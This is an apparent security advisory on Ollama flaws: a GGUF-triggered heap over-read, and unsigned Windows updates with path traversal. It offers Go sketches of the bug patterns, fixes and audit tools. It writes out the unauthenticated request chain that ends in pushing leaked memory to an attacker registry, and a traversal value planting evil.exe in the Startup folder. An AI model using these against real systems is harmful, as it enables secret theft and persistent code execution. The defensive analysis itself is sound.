Ollama, the widely deployed framework for running large language models locally, contains one critical and two high-severity vulnerabilities that expose organizations to memory exfiltration and persistent code execution. The most severe flaw affects an estimated 300,000+ servers globally, while the two additional vulnerabilities in the Windows client remain unpatched more than 90 days after disclosure.
Bleeding Llama: CVE-2026-7482 Enables Complete Memory Exfiltration
CVE-2026-7482, dubbed "Bleeding Llama" by Cyera researchers, is a heap out-of-bounds read vulnerability carrying a CVSS score of 9.1. The flaw exists in Ollama versions prior to 0.17.1 and stems from improper validation of GGUF model files submitted to the /api/create endpoint. When processing attacker-supplied GGUF files where the declared tensor offset and size exceed the file's actual length, Ollama reads past allocated heap buffers during quantization operations in fs/ggml/gguf.go and server/quantization.go.
The vulnerability originates from Ollama's use of Go's unsafe package in the WriteTo() function, which bypasses the language's memory safety guarantees. This design choice creates a pathway for attackers to craft GGUF files with inflated tensor shapes that trigger out-of-bounds heap reads during model creation.
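To make the bug class concrete, the following is a deliberately simplified Go sketch of the pattern, not Ollama's actual code; the tensorHeader type and both function names are hypothetical. The point is that a size declared in attacker-controlled metadata must be checked against the real file length before it is used to slice memory, because the unsafe package skips Go's normal bounds checks.

```go
package main

import (
	"fmt"
	"unsafe"
)

// tensorHeader mimics metadata parsed from an attacker-supplied GGUF file.
// Both fields come straight from the file and are fully attacker-controlled.
type tensorHeader struct {
	offset       uint64 // where the tensor data supposedly starts
	declaredSize uint64 // how many bytes the file claims the tensor occupies
}

// unsafeRead illustrates the dangerous pattern: trusting declared metadata and
// building a slice over raw memory with unsafe, which skips Go's bounds checks.
// If offset+declaredSize exceeds len(buf), the returned slice spans adjacent
// heap memory (API keys, other users' prompts, and so on).
func unsafeRead(buf []byte, h tensorHeader) []byte {
	base := unsafe.Pointer(&buf[0])
	start := unsafe.Add(base, h.offset)
	return unsafe.Slice((*byte)(start), h.declaredSize) // no bounds check
}

// safeRead shows the missing check: validate the declared region against the
// real file length (and guard against overflow) before slicing.
func safeRead(buf []byte, h tensorHeader) ([]byte, error) {
	end := h.offset + h.declaredSize
	if h.offset > uint64(len(buf)) || end < h.offset || end > uint64(len(buf)) {
		return nil, fmt.Errorf("tensor region %d..%d exceeds file size %d", h.offset, end, len(buf))
	}
	return buf[h.offset:end], nil
}

func main() {
	file := make([]byte, 64) // stand-in for the uploaded GGUF payload
	hostile := tensorHeader{offset: 0, declaredSize: 1 << 16}

	if _, err := safeRead(file, hostile); err != nil {
		fmt.Println("rejected:", err) // the fix: fail closed on bad metadata
	}
	_ = unsafeRead // calling this with `hostile` would read past the buffer
}
```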
Three-Step Attack Chain Requires No Authentication
The exploitation process is straightforward and requires no authentication, as Ollama's REST API lacks built-in authentication mechanisms. Attackers execute a three-step chain: First, upload a maliciously crafted GGUF file with an inflated tensor shape to a network-accessible Ollama server via HTTP POST. Second, trigger model creation using the /api/create endpoint, which activates the out-of-bounds read vulnerability. Third, exfiltrate leaked memory data by pushing the resulting model artifact to an attacker-controlled registry through the /api/push endpoint.
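For defenders writing detection rules, the chain reduces to a handful of unauthenticated HTTP requests against the endpoints named above. The sketch below shows only their approximate shape: the request bodies are assumptions based on Ollama's public API documentation and may differ between versions, the host and digest values are placeholders, and the crafted GGUF payload itself is deliberately not shown.

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
)

// post sends one step of the chain. No credentials are attached anywhere,
// because the Ollama REST API has no built-in authentication to satisfy.
func post(base, path, body string) {
	resp, err := http.Post(base+path, "application/json", bytes.NewBufferString(body))
	if err != nil {
		fmt.Println(path, "error:", err)
		return
	}
	defer resp.Body.Close()
	fmt.Println(path, "->", resp.Status)
}

func main() {
	base := "http://exposed-ollama.internal:11434" // any network-reachable instance

	// Step 1: upload the crafted GGUF (payload construction intentionally omitted;
	// /api/blobs is the documented upload route, digest value illustrative).
	// post(base, "/api/blobs/sha256:<digest>", "<gguf bytes>")

	// Step 2: create a model from it, which triggers the out-of-bounds read.
	post(base, "/api/create", `{"model": "exfil", "files": {"payload.gguf": "sha256:<digest>"}}`)

	// Step 3: push the resulting artifact, now carrying leaked heap bytes,
	// to a registry the attacker controls.
	post(base, "/api/push", `{"model": "attacker/exfil:latest", "insecure": true}`)
}
```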
Successful exploitation exposes environment variables, API keys, system prompts, and conversation data from concurrent users. Organizations using Ollama with development tools like Claude Code face amplified risk, as all tool outputs flow through the Ollama server and persist in heap memory.
"An attacker can learn basically anything about the organization from your AI inference—API keys, proprietary code, customer contracts, and much more," warned Cyera security researcher Dor Attias. The exposure scope extends to any data processed by the Ollama instance, making this particularly dangerous for organizations running local LLM inference on sensitive workloads.
Windows Update Mechanism Contains Two Unpatched Flaws
Striga researchers disclosed two additional vulnerabilities affecting Ollama's Windows update mechanism that remain unpatched as of May 2026, more than 90 days after the January 27 disclosure. CVE-2026-42248 (CVSS 7.7) is a missing signature verification flaw: unlike its macOS counterpart, the Windows updater does not validate update binaries before installing them. CVE-2026-42249 (CVSS 7.7) is a path traversal vulnerability in which the Windows updater builds local paths for installer staging directories directly from HTTP response headers, without sanitization.
The Windows desktop client auto-starts on login from the Startup folder, listens on 127.0.0.1:11434, and periodically polls the /api/update endpoint for updates. When chained with the on-login routine, these vulnerabilities enable attackers who can influence update responses to execute arbitrary code at every login. Ollama for Windows versions 0.12.10 through 0.17.5 are vulnerable.
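The path traversal half of the chain follows a familiar pattern. Below is a minimal sketch of the flaw class and its fix, assuming Windows path semantics; the staging directory, header value, and function names are hypothetical and are not taken from Ollama's updater code.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// stagingRoot is where downloaded installers are supposed to land
// (hypothetical path; Windows path semantics assumed throughout).
const stagingRoot = `C:\Users\victim\AppData\Local\Ollama\updates`

// unsafeStagePath mirrors the flawed pattern: a filename taken from an HTTP
// response header is joined into a local path without sanitization, so any
// value containing ..\ segments escapes the staging directory entirely.
func unsafeStagePath(headerValue string) string {
	return filepath.Join(stagingRoot, headerValue)
}

// safeStagePath strips directory components from the header value and
// confirms the final path still lives under the staging root.
func safeStagePath(headerValue string) (string, error) {
	name := filepath.Base(filepath.Clean(headerValue)) // drop any ..\ segments
	p := filepath.Join(stagingRoot, name)
	if !strings.HasPrefix(p, stagingRoot+string(filepath.Separator)) {
		return "", fmt.Errorf("refusing path outside staging root: %s", p)
	}
	return p, nil
}

func main() {
	hostile := `..\..\Microsoft\Windows\Start Menu\Programs\Startup\evil.exe`
	fmt.Println("unsafe:", unsafeStagePath(hostile)) // escapes the staging dir
	if p, err := safeStagePath(hostile); err == nil {
		fmt.Println("safe:  ", p) // pinned back inside the staging dir
	}
}
```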
Exploitation Scenarios and Persistence Mechanisms
Attackers can exploit the Windows flaws by controlling an update server reachable by the victim's Ollama client. One method involves overriding the OLLAMA_UPDATE_URL environment variable to point the client at a local server over plain HTTP. This assumes AutoUpdateEnabled is active, which it is by default. The missing integrity check alone enables code execution without any path traversal: the malicious installer drops into the expected staging directory and executes, with no signature re-verification, the next time the client launches from the Startup folder.
However, this approach lacks persistence, as legitimate updates overwrite the staged file. By combining it with the path traversal flaw, attackers can redirect the executable outside the usual staging path, achieving persistent code execution that survives subsequent legitimate updates. The attack surface is significant given Ollama's popularity: the project has over 171,000 GitHub stars and has been forked more than 16,100 times.
Update to Ollama 0.17.1 or later immediately to address CVE-2026-7482. For Windows users running versions 0.12.10-0.17.5, disable automatic updates and remove Ollama shortcuts from the Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup) until patches are available.
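Until a patch ships, the state of a given Windows host can be checked programmatically. The sketch below is a minimal audit helper built on the details above: it flags an overridden OLLAMA_UPDATE_URL (especially one served over plain HTTP) and lists Startup-folder entries that reference Ollama; the name matching is a heuristic for this example, not an official indicator.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

func main() {
	// Flag the update-URL override described above: a plain-HTTP or unexpected
	// origin means update responses can be influenced by whoever controls it.
	if u := os.Getenv("OLLAMA_UPDATE_URL"); u != "" {
		fmt.Println("OLLAMA_UPDATE_URL is overridden:", u)
		if strings.HasPrefix(strings.ToLower(u), "http://") {
			fmt.Println("  WARNING: update channel is plain HTTP")
		}
	}

	// Look for Ollama entries in the per-user Startup folder; any hit means
	// the client (and anything it staged) runs automatically at every login.
	startup := filepath.Join(os.Getenv("APPDATA"),
		"Microsoft", "Windows", "Start Menu", "Programs", "Startup")
	entries, err := os.ReadDir(startup)
	if err != nil {
		fmt.Println("could not read Startup folder:", err)
		return
	}
	for _, e := range entries {
		if strings.Contains(strings.ToLower(e.Name()), "ollama") {
			fmt.Println("startup entry found:", filepath.Join(startup, e.Name()))
		}
	}
}
```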
Recommended Security Controls
Organizations running Ollama must implement multiple defense layers. Apply the latest patches for CVE-2026-7482 immediately and audit all running instances for internet exposure. Ollama instances should never be directly accessible from the internet—isolate them behind firewalls and deploy authentication proxies or API gateways to compensate for the lack of built-in authentication. Limit network access to trusted IP ranges and implement network segmentation to contain potential breaches.
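As one way to add the missing authentication layer, the sketch below puts a minimal token-checking reverse proxy in front of a loopback-bound Ollama instance. It is illustrative only: the listen port and the OLLAMA_PROXY_TOKEN variable are arbitrary choices for this example, not Ollama settings, and a production deployment would typically use an existing API gateway with TLS instead.

```go
package main

import (
	"crypto/subtle"
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
	"os"
)

func main() {
	// Upstream Ollama instance, bound to loopback only (default port assumed).
	upstream, err := url.Parse("http://127.0.0.1:11434")
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(upstream)

	// Shared secret distributed to authorized clients; OLLAMA_PROXY_TOKEN is a
	// hypothetical variable name for this sketch, not an Ollama setting.
	token := os.Getenv("OLLAMA_PROXY_TOKEN")
	if token == "" {
		log.Fatal("OLLAMA_PROXY_TOKEN must be set")
	}

	handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got := r.Header.Get("Authorization")
		want := "Bearer " + token
		if subtle.ConstantTimeCompare([]byte(got), []byte(want)) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		proxy.ServeHTTP(w, r)
	})

	// Expose only the authenticated proxy to the network; never the raw API.
	log.Fatal(http.ListenAndServe("0.0.0.0:8443", handler))
}
```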
- Update Ollama to version 0.17.1 or later to patch CVE-2026-7482
- Deploy authentication proxies or API gateways in front of all Ollama instances
- Audit and remove any Ollama instances exposed to the public internet (a minimal probe sketch follows this list)
- Implement firewall rules restricting access to trusted networks only
- For Windows deployments, disable automatic updates until CVE-2026-42248 and CVE-2026-42249 are patched
- Remove Ollama from Windows Startup folders to prevent auto-execution of compromised updates
- Monitor /api/create and /api/push endpoint usage for anomalous activity
- Implement egress filtering to detect unauthorized data exfiltration attempts
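The exposure audit in the checklist above can be automated. A minimal probe, sketched below, asks each candidate host for /api/version; a successful, unauthenticated JSON response is a strong signal that the Ollama API is reachable from that network position. The host addresses are placeholders to be replaced with your own inventory or scan output.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"time"
)

// versionResponse matches the JSON returned by Ollama's /api/version endpoint.
type versionResponse struct {
	Version string `json:"version"`
}

// checkHost reports whether an Ollama API answers unauthenticated requests
// at the given address, and which version it claims to run.
func checkHost(addr string) {
	client := &http.Client{Timeout: 3 * time.Second}
	resp, err := client.Get("http://" + addr + "/api/version")
	if err != nil {
		fmt.Printf("%s: not reachable (%v)\n", addr, err)
		return
	}
	defer resp.Body.Close()

	var v versionResponse
	if resp.StatusCode == http.StatusOK && json.NewDecoder(resp.Body).Decode(&v) == nil && v.Version != "" {
		fmt.Printf("%s: EXPOSED, unauthenticated Ollama %s\n", addr, v.Version)
		return
	}
	fmt.Printf("%s: responded, but does not look like an open Ollama API\n", addr)
}

func main() {
	// Placeholder inventory; swap in the hosts you actually need to audit.
	for _, addr := range []string{"10.0.0.5:11434", "10.0.0.6:11434"} {
		checkHost(addr)
	}
}
```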
Broader Implications for Local LLM Security
These vulnerabilities highlight critical security gaps in the local LLM deployment model that many organizations have adopted to maintain data privacy. The irony is stark: organizations choose local LLM deployment specifically to avoid cloud data exposure, yet insecure implementations create attack vectors that can leak the very data they sought to protect. The use of unsafe memory operations in performance-critical AI infrastructure components represents a concerning pattern as organizations race to deploy AI capabilities without adequate security review.
The 90-day disclosure window for the Windows vulnerabilities has elapsed with no patch available, placing the burden on security teams to implement compensating controls. CERT Polska has assumed coordination of the disclosure process, suggesting potential challenges in Ollama's vulnerability response procedures. With over 300,000 potentially affected servers and Ollama's deep integration into development workflows, the attack surface extends beyond individual instances to entire development pipelines and connected toolchains.